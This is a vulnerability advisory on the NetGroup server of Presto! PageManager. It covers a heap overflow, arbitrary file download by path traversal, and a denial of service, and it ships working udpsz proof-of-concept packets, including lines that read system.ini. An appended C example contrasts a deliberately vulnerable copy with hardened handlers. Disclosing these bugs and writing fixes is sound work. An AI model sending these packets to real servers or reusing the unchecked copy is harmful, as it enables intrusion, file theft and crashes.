#######################################################################

                             Luigi Auriemma

Application:  Presto! PageManager
              http://www.newsoftinc.com/products/product_page.php?P_Id=5
Versions:     <= 9.01
Platforms:    Windows, MacOSX
Bugs:         A] Heap-overflow
              B] Arbitrary file download
              C] Denial of Service
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Presto! PageManager is management software for scanners; some hardware
vendors (for example Epson) ship it by default with their devices.
It comes with a server component called NetGroup, started manually by
the user, for transferring files between group members:

  "The Network Group function helps you exchange files with your group
   members. Everyone in the working group should have Presto! PageManager
   running."

#######################################################################

=======
2) Bugs
=======

----------------
A] Heap-overflow
----------------

Heap overflow on port 2502: the message string received from the client
is copied into a small heap buffer using its strlen() as the copy length,
with no check against the size of the destination buffer:

  004151BE  |. 33C0           XOR EAX,EAX
  004151C0  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]        ; strlen
  004151C2  |. F7D1           NOT ECX
  004151C4  |. 2BF9           SUB EDI,ECX
  004151C6  |. 6A FF          PUSH -1
  004151C8  |. 8BC1           MOV EAX,ECX
  004151CA  |. 8BF7           MOV ESI,EDI
  004151CC  |. 8BFA           MOV EDI,EDX
  004151CE  |. C1E9 02        SHR ECX,2                            ; heap overflow
  004151D1  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  004151D3  |. 8BC8           MOV ECX,EAX
  004151D5  |. 83E1 03        AND ECX,3
  004151D8  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  004151DA  |. 8D4C24 14      LEA ECX,DWORD PTR SS:[ESP+14]
  004151DE  |. E8 1B370000    CALL <JMP.&MFC42.#5572>
  004151E3  |. 8B5424 10      MOV EDX,DWORD PTR SS:[ESP+10]
  004151E7  |. 8D4C24 2C      LEA ECX,DWORD PTR SS:[ESP+2C]
  004151EB  |. 51             PUSH ECX
  004151EC  |. 52             PUSH EDX
  004151ED  |. E8 56350000    CALL <JMP.&PMCommon._GetFileExtName>
  004151F2  |. BE 94014200    MOV ESI,NetGroup.00420194            ; ASCII ".NSOFT"

--------------------------
B] Arbitrary file download
--------------------------

The file name in a download request is used as-is, so a client can
retrieve any file readable by the server: an absolute path such as
c:\windows\system.ini is accepted, and so is a "../" traversal sequence
relative to the shared folder (see the two test packets below).

--------------------
C] Denial of Service
--------------------

The server terminates itself when it cannot allocate the amount of
memory specified by the client (0xffffffff in the tests below is
accepted without any upper bound). There is also a division by zero
when a file size of 0 bytes is specified.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip

A]
  udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff

  This is only a quick crash test; there are better ways to reach code
  execution.

B]
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8

  or

  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8

C]
  udpsz -T -C "00010000 ffffffff" SERVER 2501 -1

  or

  udpsz -T -C "00000100 ffffffff" SERVER 2502 -1

#######################################################################

======
4) Fix
======

No fix.

#######################################################################
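The three bugs above, as an added example that is not part of Luigi Auriemma's advisory or of the NetGroup code: a hypothetical C message handler in the shape the disassembly and the udpsz packets suggest, with the unchecked strlen()/REP MOVS copy from A] next to a bounded version, the file-name restriction that rejects both B] strings, and the length cap and zero-size check for C]. The 8-byte header layout [type:u32le][len:u32le] (my little-endian reading of the udpsz hex strings), the message type values, the 32-byte buffer size, the 0x10000 cap and the MSG_SENDFILE message are assumptions of this example, not values from the advisory.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed wire format (my reading of the udpsz strings in the advisory, not stated
 * there): [type:u32le][len:u32le][body]. Types and sizes are hypothetical stand-ins. */
#define MAX_BODY_LEN  0x10000u      /* cap on the client-supplied body length (bug C) */
#define NAME_BUF_SIZE 32u           /* the "small heap buffer" of bug A */
#define MSG_NAME      0x00010000u   /* body: NUL-terminated sender name */
#define MSG_GETFILE   0x00020000u   /* body: NUL-terminated file name to download */
#define MSG_SENDFILE  0x00030000u   /* body: [size:u32le]; size is later used as a divisor */

enum verdict { V_OK = 0, V_SHORT, V_TOO_BIG, V_NAME_TOO_LONG, V_BAD_PATH, V_ZERO_SIZE, V_UNKNOWN };

struct msg { uint32_t type; uint32_t len; const uint8_t *body; };

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Validate the declared body length against a fixed cap and against the bytes that
 * actually arrived, before anything is allocated or copied. */
enum verdict parse_msg(const uint8_t *pkt, size_t pktlen, struct msg *m)
{
    if (pktlen < 8) return V_SHORT;
    m->type = le32(pkt);
    m->len  = le32(pkt + 4);
    m->body = pkt + 8;
    if (m->len > MAX_BODY_LEN) return V_TOO_BIG;   /* bug C: would otherwise feed malloc(len) */
    if (m->len > pktlen - 8)   return V_SHORT;     /* declared more than was received */
    return V_OK;
}

/* Bug A as seen in the disassembly: strlen() then REP MOVS into a fixed heap block,
 * with no comparison against the block size. Never call this with untrusted data. */
char *vulnerable_copy_name(const char *name)
{
    char *dst = malloc(NAME_BUF_SIZE);
    if (dst) strcpy(dst, name);                  /* writes past dst when strlen(name) >= 32 */
    return dst;
}

/* Hardened form: the name must be NUL-terminated inside the body and must fit the buffer. */
enum verdict safe_copy_name(const uint8_t *body, size_t len, char **out)
{
    const uint8_t *nul = memchr(body, 0, len);
    if (nul == NULL) return V_NAME_TOO_LONG;     /* no terminator inside the message */
    size_t n = (size_t)(nul - body);
    if (n >= NAME_BUF_SIZE) return V_NAME_TOO_LONG;
    char *dst = malloc(NAME_BUF_SIZE);
    if (dst == NULL) return V_TOO_BIG;
    memcpy(dst, body, n + 1);
    *out = dst;
    return V_OK;
}

/* Bug B: a download name from the wire must be a bare file name inside the shared
 * folder, so both advisory strings (drive-letter path, "../" chain) fail here.
 * Requiring the ".NSOFT" extension the server compares against is an extra assumption. */
bool download_name_is_safe(const char *name)
{
    static const char ext[] = ".NSOFT";
    size_t e = sizeof(ext) - 1, n = strlen(name);
    if (n == 0 || n > 255) return false;
    if (strpbrk(name, "/\\:") != NULL) return false;   /* separators or drive letter */
    if (strstr(name, "..") != NULL) return false;      /* traversal component */
    return n > e && strcmp(name + n - e, ext) == 0;
}

/* Bug C, second half: a client-supplied file size of 0 used as a divisor. */
enum verdict progress_percent(uint32_t done, uint32_t size, uint32_t *pct)
{
    if (size == 0) return V_ZERO_SIZE;
    if (done > size) done = size;
    *pct = (uint32_t)((uint64_t)done * 100u / size);
    return V_OK;
}

/* Dispatcher tying the checks together; the verdict says why a packet was rejected. */
enum verdict handle_packet(const uint8_t *pkt, size_t pktlen)
{
    struct msg m;
    enum verdict v = parse_msg(pkt, pktlen, &m);
    if (v != V_OK) return v;
    switch (m.type) {
    case MSG_NAME: {
        char *name = NULL;
        v = safe_copy_name(m.body, m.len, &name);
        free(name);
        return v;
    }
    case MSG_GETFILE:
        if (memchr(m.body, 0, m.len) == NULL) return V_BAD_PATH;
        return download_name_is_safe((const char *)m.body) ? V_OK : V_BAD_PATH;
    case MSG_SENDFILE: {
        uint32_t pct;
        if (m.len < 4) return V_SHORT;
        return progress_percent(0, le32(m.body), &pct);
    }
    default:
        return V_UNKNOWN;
    }
}

/* Build one packet in the assumed format from constructed test data and run it
 * through the handler; this is how the advisory's packets are replayed offline. */
enum verdict verdict_for(uint32_t type, uint32_t declared_len, const void *body, size_t bodylen)
{
    uint8_t pkt[8 + 512];
    if (bodylen > sizeof pkt - 8) return V_TOO_BIG;
    for (int i = 0; i < 4; i++) {
        pkt[i]     = (uint8_t)(type >> (8 * i));
        pkt[4 + i] = (uint8_t)(declared_len >> (8 * i));
    }
    memcpy(pkt + 8, body, bodylen);
    return handle_packet(pkt, 8 + bodylen);
}
```

The point of the A] fix is that the copy bound comes from the destination size and the received length, never from strlen() of data the client controls; the B] check deliberately refuses any separator rather than trying to normalise the path, and the C] cap is applied before the allocator is ever asked for the client's number.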